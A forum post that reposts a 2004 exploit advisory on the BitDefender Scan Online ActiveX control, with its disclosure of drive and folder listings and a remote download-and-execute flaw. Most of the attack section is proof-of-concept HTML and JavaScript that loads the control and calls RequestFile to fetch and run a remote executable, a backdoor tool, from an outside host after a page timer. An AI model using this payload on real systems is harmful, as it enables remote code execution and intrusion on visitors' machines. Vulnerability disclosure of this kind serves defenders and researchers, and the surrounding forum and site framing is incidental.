Jump to content

info on bitdefender


Cpt James T. Kirk
 Share

Recommended Posts

ok, i could not find the way to get this to do it by link so i pasted the article here:

Site-News: (A) What you need to know. by A^C^E at 29.10.2004 16:22:26 30.10.2004 19:50:51

Search site: TechNews Security Downloads Miscellaneous Advanced Bookmark Submit News

Navigation Bar

- Mixed List -

- Categories -

- Tech News -

- Downloads -

- Security -

- Archive -

- Miscellaneous -

- Top 10 -

- Links -

- About -

- Main -

Sponsoring

Addict3d.org sponsors

EvilLyrics

Lyrics and karaoke

search tool

Statistics

Last Update:

6 Hours

11 Mins 57 Secs ago

Visitors: 349524

Online: 83

Article

TO YOUR ATTENTION!!!!

By reading this you understand and agree that everything that is written in this article is for educational use only, and none of it should be used at any circumsetences, and if you choose to use this information for any kind of action you take full responsibility for it and release addict3d.org © of any responsibility.

If you do not agree to whats written here, LEAVE NOW!

--------------------------------------------------------------------------------

BitDefender Scan Online - Remote File Download & Execute & Private

Added by: A^C^E

Date: 19.04.04

Time: 21:13:30

Category: Exploits

Source: http://www.securityfocus.com

Application: BitDefender Scan Online(ActiveX)

Vendors: http://www.bitdefender.com/scan/Msie/index.php

Platforms: Windows

Bug: Remote File Download & Execute & Private Information

Disclosure

Risk: High - Running Arbitary Code

Exploitation: Remote with browser

Date: 19 Apr 2004

Author: Rafel Ivgi, The-Insider

e-mail: the_insider mail com

web: http://theinsider.deep-ice.com

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

1) Introduction

2) Bugs

3) The Code

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

===============

1) Introduction

===============

This is a quote of BitDefender Scan Online Description:

"BitDefender Scan Online is a fully functional antivirus product, with a

web-based interface and featuring all required elements for remotely

antivirus scanning and cleaning: it scans system's memory, all files,

folders and drives' boot sector, providing the user with the option to

automatically clean the infected files.

This is a quote of the page title:

"BitDefender AntiVirus - Data Security, AntiVirus Software, Free

Protection".

The meaning of this sentence is very far from reality.

I believe this to be a ridiculous that an AntiVirus will deliver and execute

a virus on my system.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

======

2) Bug

======

"BitDefender Scan Online" downloads its components and registered

the following COM/ActiveX Object:

"AVXSCANONLINE.AvxScanOnlineCtrl.1"

With the following CLSID:

80DD2229-B8E4-4C77-B72F-F22972D723EA

"BitDefender Scan Online" has confusing protection, all properties and

functions cannot be set/accessed by the :

object = new ActiveXObject("AVXSCANONLINE.AvxScanOnlineCtrl.1")

It can only be set/accessed using(html object tag created object):

"<OBJECT id=mymy

codeBase=http://www.bitdefender.com/scan/Msie/bitdefender.cab#version=3,0,0,

1

hspace=0 vspace=0 align="top"

classid=CLSID:80DD2229-B8E4-4C77-B72F-F22972D723EA

width=405 height=180>"

----------------------------------------------------------------------------

--------------------------------------------------

"BitDefender Scan Online" Disclosures the users information, allowing a

remote user to see

all drives and folders of the system using this simple code:

------------------- CUT HERE -------------------

<OBJECT id=seemycomputer

codeBase=http://www.bitdefender.com/scan/Msie/bitdefender.cab#version=3,0,0,

1

hspace=0 vspace=0 align="top"

classid=CLSID:80DD2229-B8E4-4C77-B72F-F22972D723EA

width=405 height=180>

<PARAM NAME="_ExtentX" VALUE="6614">

<PARAM NAME="_ExtentY" VALUE="4498">

<PARAM NAME="_StockProps" VALUE="9">

<PARAM NAME="ForeColor" VALUE="0">

<PARAM NAME="BackColor" VALUE="16777215"></OBJECT>

------------------- CUT HERE -------------------

----------------------------------------------------------------------------

--------------------------------------------------

"BitDefender Scan Online" contains a function that will

***DOWNLOAD A REMOTE FILE AND WILL EXECUTE IT ON THE SYSTEM***

For Example:

object.RequestFile(&quot;http://ntsecurity.nu/downloads/tini.exe","c:\\");

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

===========

3) The Code

===========

This is Proof Of Concept Code:

------------------- CUT HERE -------------------

<OBJECT id=mymy

codeBase=http://www.bitdefender.com/scan/Msie/bitdefender.cab#version=3,0,0,

1

hspace=0 vspace=0 align="top"

classid=CLSID:80DD2229-B8E4-4C77-B72F-F22972D723EA

width=405 height=180>

<PARAM NAME="Id" VALUE="Trusted">

<PARAM NAME="_ExtentX" VALUE="6614">

<PARAM NAME="_ExtentY" VALUE="4498">

<PARAM NAME="_StockProps" VALUE="9">

<PARAM NAME="ForeColor" VALUE="0">

<PARAM NAME="BackColor" VALUE="16777215"></object>

<script>

var a;

function cool() {

mymy.Update();

mymy.Updating(1);

mymy.SetCountry("Israel");

mymy.EnableRtvr(1);

mymy.SetupMode = true;

mymy.RequestFile(&quot;http://ntsecurity.nu/downloads/tini.exe","c:\\");

}

setTimeout("cool()", 1500);

</script>

------------------- CUT HERE -------------------

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

---

Rafel Ivgi, The-Insider

http://theinsider.deep-ice.com

"Only the one who sees the invisible , Can do the Impossible."

Related articles

Code-Crafters Ability FTPd v2.34 - New Exploit Attached

connect to all open ports

Post-Nuke Trojan Horse

New URL spoofing bug in Microsoft Internet Explorer

WvTftp option name heap overflow remote root exploit

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

 Share

×
×
  • Create New...

Important Information

We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue. Privacy Policy